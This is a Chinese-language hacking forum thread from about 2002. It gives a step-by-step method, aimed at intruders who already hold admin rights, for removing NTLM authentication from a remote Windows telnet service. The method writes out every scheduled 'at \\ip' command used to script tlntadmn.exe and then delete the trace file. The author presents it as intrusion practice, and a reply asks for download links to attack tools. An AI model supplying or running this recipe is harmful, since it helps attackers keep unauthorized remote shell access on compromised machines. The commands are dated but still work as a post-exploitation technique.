|
 | 作者: group [group]
 论坛用户 |
登录 |
| 不需要任何工具,远程屏蔽telnet服务的ntlm认证 ------------------------------------------------------------------------------ -- 编辑:天浪 来源: 类别:技术文摘 日期:2002.04.06 今日/总浏览: 120/563 很多人获得上传文件的权限和管理员权限以后想启动远程的tlelnet服务,但是却碰 到 讨厌的NTLM认证,对于这种情况,我们很多时候就采用上传文件(比如NTLM.exe),然后 at远程定时执行,如果手头上没有这样的工具怎么办呢? 可以这么做: 大家可以看一下win2000和nt4自带tlntadmn这个命令,他是用来控制台修改telnet设置的 ,很可惜这是一个控制台的交互式工具,所以at命令没有办法直接调用。 现在我们执行一下tlntadmn,然后按照以下的顺序操作 停止服务(5)->更改设置(3)->NTLM(7)->确认更改(y)->修改NTLM当前值(0)->再次确认 (y)->退出菜单(0)->启动服务(4)->退出程序(0) 现在大家记住了吧,先后顺序是5(回车)3(回车)7(回车)y(回车)0(回车)y(回车)0(回车 )4(回车)0(回车) 线在我们这么做 at \\ip time "echo 5 > c:\t.txt" at \\ip time "echo 3 >> c:\t.txt" at \\ip time "echo 7 >> c:\t.txt" at \\ip time "echo y >> c:\t.txt" at \\ip time "echo 0 >> c:\t.txt" at \\ip time "echo y >> c:\t.txt" at \\ip time "echo 0 >> c:\t.txt" at \\ip time "echo 4 >> c:\t.txt" at \\ip time "echo 0 >> c:\t.txt" at \\ip time "c:\winnt\system32\tlntadmn.exe < c:\t.txt" at \\ip time "del c:\t.txt /f" 呵呵按照上面的顺序一步一步执行 当然你本地做一个t.txt文件也可以,内容如下: 5 3 7 y 0 y 0 4 0 每个字符后面要加回车,然后copy t.txt \\ip\c$ 然后再 at \\ip time "c:\winnt\system32\tlntadmn.exe < c:\t.txt" at \\ip time "del c:\t.txt /f" 很简单的dos重定向原理,t.txt就相当于手工输入一系列的操作,完成tlntadmn的交互 呵呵 当然,你们可以在本地试验好以后再发到远程主机去 我写的那个sqlcandy远程启动telnet服务,删除ntlm认证就是这么做的 当然有工具是最好了 但是劝大家练习入侵的时候尽量不要使用工具,这样对自己没有帮助的 .:) |
| 地主 发表时间: 04/11 15:09 |
 | 回复: wyl [wyl]  论坛用户 |
登录 |
|
请问我也知道ntlm大部分人上传,可哪找ntml.exe呀?下载地址? 还有sqlcandy介绍一下 ,下载地址? -------您的文章很有帮助------- [此贴被 小林(wyl) 在 01月29日22时02分 编辑过] |
| B1层 发表时间: 2003-01-29 22:50:02 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 菜鸟乐园 标题: 不需要任何工具,远程屏蔽telnet服务的ntlm认证